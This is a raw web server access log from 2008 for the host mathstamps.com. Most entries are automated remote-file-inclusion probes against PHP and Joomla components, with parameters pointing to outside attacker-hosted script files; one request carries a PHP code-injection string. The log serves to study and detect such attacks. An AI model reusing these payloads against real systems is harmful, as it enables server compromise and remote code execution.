194.158.195.132 - - [25/May/2008:20:41:47 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.158.195.132 - - [25/May/2008:20:41:53 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:42:16 -0700] "GET /logs/access_080331.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
216.236.255.134 - - [25/May/2008:20:42:44 -0700] "GET /logs/access.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.236.255.134 - - [25/May/2008:20:42:44 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:45:11 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:45:11 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
216.236.255.134 - - [25/May/2008:20:47:44 -0700] "GET /logs/access_080428.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:50:11 -0700] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:50:11 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:50:11 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
216.254.103.223 - - [25/May/2008:20:50:51 -0700] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.254.103.223 - - [25/May/2008:20:50:51 -0700] "GET //_blogadata/include/struct_admin.php?incl_page=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:53:27 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:56:06 -0700] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:56:06 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:20:56:06 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
74.6.18.225 - - [25/May/2008:20:56:06 -0700] "GET /logs/?S=A HTTP/1.0" 200 7500 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
63.247.129.200 - - [25/May/2008:20:57:34 -0700] "GET /logs/access_080421.log/index.php?option=com_custompages&cpage=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.247.129.200 - - [25/May/2008:20:57:35 -0700] "GET /index.php?option=com_custompages&cpage=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.247.129.200 - - [25/May/2008:20:57:35 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.247.129.200 - - [25/May/2008:20:58:44 -0700] "GET /logs/access_080428.log/index.php?option=com_custompages&cpage=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.6.22.165 - - [25/May/2008:20:59:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.9.184 - - [25/May/2008:20:59:01 -0700] "GET /logs/access_080519.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
216.75.35.118 - - [25/May/2008:21:00:24 -0700] "GET /logs//config.php?inc_dir=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [25/May/2008:21:00:24 -0700] "GET //config.php?inc_dir=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:02:07 -0700] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:02:07 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:02:08 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:08:21 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.161.104 - - [25/May/2008:21:09:10 -0700] "GET /logs/access_080505.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.161.104 - - [25/May/2008:21:09:10 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.161.104 - - [25/May/2008:21:09:10 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.6.155.217 - - [25/May/2008:21:09:23 -0700] "GET /logs/access_080505.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.6.155.217 - - [25/May/2008:21:09:24 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.6.155.217 - - [25/May/2008:21:09:24 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.161.104 - - [25/May/2008:21:09:25 -0700] "GET /logs/access_080331.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.6.155.217 - - [25/May/2008:21:09:53 -0700] "GET /logs/access_080331.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:21:10:22 -0700] "GET /logs/access_080505.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:21:10:23 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:21:10:23 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:21:10:39 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:21:10:39 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
198.106.22.9 - - [25/May/2008:21:10:51 -0700] "GET /logs/access_080331.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:16:24 -0700] "GET /logs/access_080331.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:16:24 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:16:25 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:16:56 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:21:17:31 -0700] "GET /logs/access_080421.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:21:17:34 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
158.227.2.24 - - [25/May/2008:21:17:40 -0700] "GET //?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:17:42 -0700] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:17:42 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.60.64.194 - - [25/May/2008:21:17:43 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:21:19:26 -0700] "GET /logs/access_080428.log//index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:21:19:26 -0700] "GET //index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:21:19:27 -0700] "GET /logs//index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:21:19:30 -0700] "GET /logs/access_080428.log//index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:21:19:30 -0700] "GET //index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:21:19:30 -0700] "GET /logs//index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:21:19:43 -0700] "GET /logs/access_080428.log//index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:21:19:43 -0700] "GET //index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:21:19:43 -0700] "GET /logs//index.php?option=com_babackup&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.6.155.217 - - [25/May/2008:21:19:47 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.6.155.217 - - [25/May/2008:21:19:48 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
63.243.44.3 - - [25/May/2008:21:26:10 -0700] "GET /index.php?option=com_custompages&cpage=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.mathstamps.com"
63.243.44.3 - - [25/May/2008:21:26:10 -0700] "GET /index.php?option=com_custompages&cpage=&mosConfig_absolute_path=http://www.fullscores.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.mathstamps.com"
63.243.44.3 - - [25/May/2008:21:26:11 -0700] "GET /logs/index.php?option=com_custompages&cpage=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.mathstamps.com"
63.243.44.3 - - [25/May/2008:21:26:11 -0700] "GET /logs/index.php?option=com_custompages&cpage=&mosConfig_absolute_path=http://www.fullscores.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.mathstamps.com"
74.6.17.177 - - [25/May/2008:21:31:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
74.6.21.49 - - [25/May/2008:21:31:13 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
202.60.64.194 - - [25/May/2008:21:31:16 -0700] "GET /logs/access_080428.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.6.7.170 - - [25/May/2008:21:33:56 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.51.168 - - [25/May/2008:21:34:25 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
158.227.2.24 - - [25/May/2008:21:36:03 -0700] "GET /logs/access_080324.log//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
158.227.2.24 - - [25/May/2008:21:36:04 -0700] "GET /logs//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 7521 "-" "libwww-perl/5.65" "www.mathstamps.com"
158.227.2.24 - - [25/May/2008:21:38:25 -0700] "GET /logs/access_080331.log//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:21:43:53 -0700] "GET /logs/access_080331.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
194.158.195.132 - - [25/May/2008:21:44:12 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.158.195.132 - - [25/May/2008:21:44:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:21:44:29 -0700] "GET /logs/access_080414.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:21:44:29 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
63.134.253.108 - - [25/May/2008:21:44:29 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:21:46:10 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:21:46:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:21:46:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
207.58.138.166 - - [25/May/2008:21:46:27 -0700] "GET //ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:21:46:44 -0700] "GET /logs/access_080414.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:21:46:44 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
209.62.26.18 - - [25/May/2008:21:46:45 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.94.56.38 - - [25/May/2008:21:47:34 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://www.hogarycasa.com/revista6/peques/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.mathstamps.com"
207.58.138.166 - - [25/May/2008:21:48:33 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.138.166 - - [25/May/2008:21:48:33 -0700] "GET //ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.138.166 - - [25/May/2008:21:54:10 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.138.166 - - [25/May/2008:21:54:10 -0700] "GET //ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.138.166 - - [25/May/2008:21:54:10 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.138.166 - - [25/May/2008:21:54:11 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:22:00:41 -0700] "GET /logs/access.log//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:22:00:42 -0700] "GET //index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:22:00:42 -0700] "GET /logs//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:22:00:50 -0700] "GET /logs/access.log//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:22:00:50 -0700] "GET //index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:22:00:50 -0700] "GET /logs//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:22:00:53 -0700] "GET /logs/access.log//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:22:00:54 -0700] "GET //index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:22:00:54 -0700] "GET /logs//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
85.17.3.183 - - [25/May/2008:22:02:02 -0700] "GET //?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kingsofwarcraft.com/info? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.236.48.244 - - [25/May/2008:22:02:31 -0700] "GET /logs/access_080428.log//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [25/May/2008:22:02:45 -0700] "GET /logs/access_080428.log//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.79.246.70 - - [25/May/2008:22:03:26 -0700] "GET /logs/access_080428.log//index.php?option=com_facileforms&&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
212.227.119.52 - - [25/May/2008:22:07:06 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.119.52 - - [25/May/2008:22:07:06 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://g4br13l.iespana.es/idsforscan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.38.87.236 - - [25/May/2008:22:10:26 -0700] "GET /logs/access_080421.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.38.87.236 - - [25/May/2008:22:10:26 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.38.87.236 - - [25/May/2008:22:10:26 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.covoiturage.fr/CALC/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
